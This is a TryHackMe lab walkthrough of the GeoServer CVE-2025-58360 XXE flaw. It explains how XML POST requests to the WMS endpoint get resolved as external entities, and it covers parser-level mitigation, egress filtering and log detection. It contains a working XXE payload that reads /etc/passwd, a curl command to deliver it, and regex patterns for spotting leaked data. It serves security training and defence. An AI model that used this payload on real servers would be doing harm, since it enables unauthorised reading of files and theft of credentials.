Deconstructing GeoServer's 2025 XXE | TryHackMe Walkthrough

In GeoServer CVE-2025-58360, we are dealing with an XML External Entity (XXE) vulnerability in 2025, a flaw that arguably should have been extinct a decade ago.

The challenge forces you to stop thinking like a script kiddie looking for a Metasploit module and start thinking like a protocol auditor who understands that the standards defining the web (like OGC's WMS) are often the very vectors that betray it.

What This Vulnerability Really Tests

At its core, it is a rigorous examination of your ability to manipulate Structured Data Protocols beyond standard HTTP parameter fuzzing.

It tests your competency in Protocol Switching: recognizing that while a Web Map Service (WMS) is typically queried via GET requests in a browser (e.g., ?request=GetMap), the specification mandates support for XML-based POST requests.

This is where the vulnerability lives. The room challenges you to identify that the application's XML parser is configured promiscuously, allowing Document Type Definitions (DTDs) to define external entities.

It tests your ability to craft Out-of-Band or Error-Based data exfiltration payloads, verifying if you can trick a Java application into reading its own filesystem (/etc/passwd) and spitting the content back at you in an error log. It is a test of white-box logic applied to a black-box endpoint.

Enumeration Methodology

The standard directory-busting approach is functionally useless here because the endpoint /geoserver/wms is likely already known or easily discovered. The elite methodology requires a Method Swapping audit.

When you encounter a RESTful or SOAP-like endpoint that behaves normally with GET requests, your immediate instinct must be to test its behavior with POST. You are looking for the Content-Type disparity.

In this specific case, you interact with the GetMap operation. Standard enumeration involves capturing a legitimate GET request for a map layer (like trymapme_offices) and converting it into its XML equivalent.

You aren't just looking for a 200 OK; you are probing the parser.

You send a minimal XML structure to see if the server accepts it. If it does, you inject a benign DTD (like defining an entity &test; with the value "hello") to see if the server resolves it. If "hello" appears in the error message or the rendered map label, you have confirmed the parser is vulnerable.

Commands Cheat Sheet

While the logic is paramount, having the precision syntax is critical for exploitation, especially when dealing with the strict XML formatting required by GeoServer.

The Execution Command

Use curl to fire this XML at the WMS endpoint, ensuring the Content-Type is strictly set to generic XML or the specific WMS mime-type.

curl -X POST -H "Content-Type: application/xml" -d @payload.xml http://<TARGET_IP>/geoserver/wms

The Error-Based XXE Payload:

This payload constructs a malicious XML POST request that defines an external entity pointing to the sensitive file. We place the entity reference &xxe; inside a field we know the server will process (and likely fail on, revealing the data in the error).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer>
      <Name>trymapme_offices</Name>
      <UserStyle>
        <Name>&xxe;</Name>
        <FeatureTypeStyle>
          <Rule>
            <PointSymbolizer/>
          </Rule>
        </FeatureTypeStyle>
      </UserStyle>
    </UserLayer>
  </StyledLayerDescriptor>
</GetMap>

Common Mistakes

The most fatal error on this box is Protocol rigidity. Researchers often try to inject the XXE payload into the URL parameters of a GET request, which will fail because the vulnerable code path is triggered only when the XML parser is invoked via the request body. Another common mistake is Ignoring the Error Logs.

In this specific CVE, the data exfiltration often happens via verbose error messages. If you are expecting the /etc/passwd file to be rendered as a map image, you will be disappointed.

You must read the HTTP response body (the XML error) to find the leaked text. Finally, many testers fail to properly structure the OGC-compliant XML wrapper (GetMap, StyledLayerDescriptor), causing the server to reject the request as "Malformed" before the parser even reaches the malicious DTD.

Tool Usage Patterns

This environment demands a surgical approach to tooling. Burp Suite Professional (or Community) is essential, particularly the Repeater tab, as it allows you to rapidly iterate on the XML structure and view the raw response headers and body.

You will be heavily relying on the Send to Repeater workflow. However, for the initial discovery or if you are working from a headless AttackBox, curl is your scalpel. You need to become comfortable using curl with the -d @filename flag to send clean, pre-formatted XML files, avoiding the escaping hell of trying to put XML into a command-line string.

Automated scanners like SQLMap are useless here; this is a logic flaw in the parser, not a database injection (though it feels similar).

Security Lesson & Mitigation

The primary lesson from CVE-2025-58360 is that default configurations are often insecure. GeoServer vulnerabilities frequently arise because the underlying XML parsers (often provided by Java libraries) have external entity resolution enabled by default.

Mitigation

The fix is rarely in the code logic but in the parser configuration. Developers must explicitly disable DTD processing in their DocumentBuilderFactory settings (setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)).
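The same "refuse any DOCTYPE before anything else is read" rule, written here as an added illustration in Python's standard-library expat parser rather than Java; it is not GeoServer's code or the room's, and the two GetMap bodies are constructed samples in the shape the walkthrough shows.

```python
import xml.parsers.expat

# Constructed sample bodies: a clean WMS GetMap POST, and the same request
# carrying the DTD from the walkthrough (entity pointed at /etc/passwd).
CLEAN_GETMAP = b"""<?xml version="1.0" encoding="UTF-8"?>
<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer><Name>trymapme_offices</Name></UserLayer>
  </StyledLayerDescriptor>
</GetMap>"""

XXE_GETMAP = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer><Name>&xxe;</Name></UserLayer>
  </StyledLayerDescriptor>
</GetMap>"""


class DoctypeRejected(ValueError):
    """Raised the moment the parser meets a DOCTYPE declaration."""


def parse_wms_body(body: bytes) -> list[str]:
    """Parse a WMS POST body, refusing any document that carries a DTD.

    This is the Python counterpart of Java's disallow-doctype-decl feature:
    the DOCTYPE handler fires before any entity can be declared, so the
    parse aborts before an external entity could ever be resolved.
    Returns the element names seen, to show a clean request still parses.
    """
    parser = xml.parsers.expat.ParserCreate()
    elements: list[str] = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in WMS requests")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(body, True)
    return elements


def screen_request(body: bytes) -> str:
    """Return 'accepted' or 'rejected: <reason>' for one request body."""
    try:
        parse_wms_body(body)
    except DoctypeRejected as exc:
        return f"rejected: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return f"rejected: malformed XML ({exc})"
    return "accepted"
```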

Infrastructure Defense

On the network level, egress filtering is critical. If the XXE were blind (no error output), the attacker would try to make the server call out to their machine. Blocking the server from initiating outbound connections to the internet or internal subnets neuters the SSRF component of this attack.

Expert Hints

If you are investigating the logs to answer the room's questions, pay close attention to the geoserver_app.log. The vulnerability is "noisy." When the attacker (or you) forces the server to read a file that isn't a valid style descriptor, the server throws an exception.

That exception contains the content of the file it tried to parse. Look for stack traces that seem to contain "root:x:0:0" strings—that's your stolen password file. Also, remember that the "flag" might not be in a standard text file; the attacker might have used the XXE to list directories or read application config files to find it.
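A small log triage script for the pattern described above, added here as an example that is not part of the room; the geoserver_app.log excerpt is constructed (GeoServer's real line format is not reproduced) and the indicator patterns are this example's own.

```python
import re

# Constructed excerpt shaped like a geoserver_app.log. Line 3 models an
# exception echoing the text the parser tried to use as a style name, which
# is how the leak surfaces; line 4 models a rejected DOCTYPE after hardening.
SAMPLE_LOG = """\
2025-09-01 10:14:02,117 INFO [geoserver.wms] - Request: getMap layers=trymapme_offices
2025-09-01 10:14:05,902 INFO [geoserver.ows] - POST /geoserver/wms content-type=application/xml
2025-09-01 10:14:05,931 ERROR [geoserver.ows] - Invalid style name: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2025-09-01 10:14:05,933 ERROR [geoserver.ows] - org.xml.sax.SAXParseException: DOCTYPE is disallowed (disallow-doctype-decl is set to true)
2025-09-01 10:15:40,004 INFO [geoserver.wms] - Request: getCapabilities
"""

# Two indicator classes: /etc/passwd-style records leaking through an
# exception message, and any trace of a DTD or external entity declaration.
INDICATORS = {
    "passwd_content": re.compile(r"\b\w+:x:\d+:\d+:[^:]*:[^:\s]*:[^:\s]*"),
    "dtd_markers": re.compile(
        r"<!DOCTYPE|<!ENTITY|SYSTEM\s+\"file:|disallow-doctype-decl", re.I
    ),
}


def scan_geoserver_log(text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, indicator, matched_text) for every hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in INDICATORS.items():
            for match in pattern.finditer(line):
                findings.append((lineno, label, match.group(0)))
    return findings


def leaked_accounts(text: str) -> list[str]:
    """Account names from passwd records found in the log, so a responder
    can see exactly which file content left the box."""
    return [
        matched.split(":", 1)[0]
        for _, label, matched in scan_geoserver_log(text)
        if label == "passwd_content"
    ]


if __name__ == "__main__":
    for lineno, label, matched in scan_geoserver_log(SAMPLE_LOG):
        print(f"line {lineno}: {label}: {matched}")
```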

Certifications Prep Suggestions

This machine is an ideal training ground for intermediate-to-advanced certifications that require manual web application exploitation:

OSWE (OffSec Web Expert): The requirement to construct a valid XML payload based on reading documentation (OGC standards) and then exploiting it is the core of the OSWE exam.

BSCP (Burp Suite Certified Practitioner): This is a textbook example of "XML External Entity injection," a category that frequently appears in the BSCP exam's mystery labs.

eWPTX (eLearnSecurity Web Penetration Tester eXtreme): The need to pivot from a known service (WMS) to an exploitation vector fits perfectly with the eWPTX syllabus.
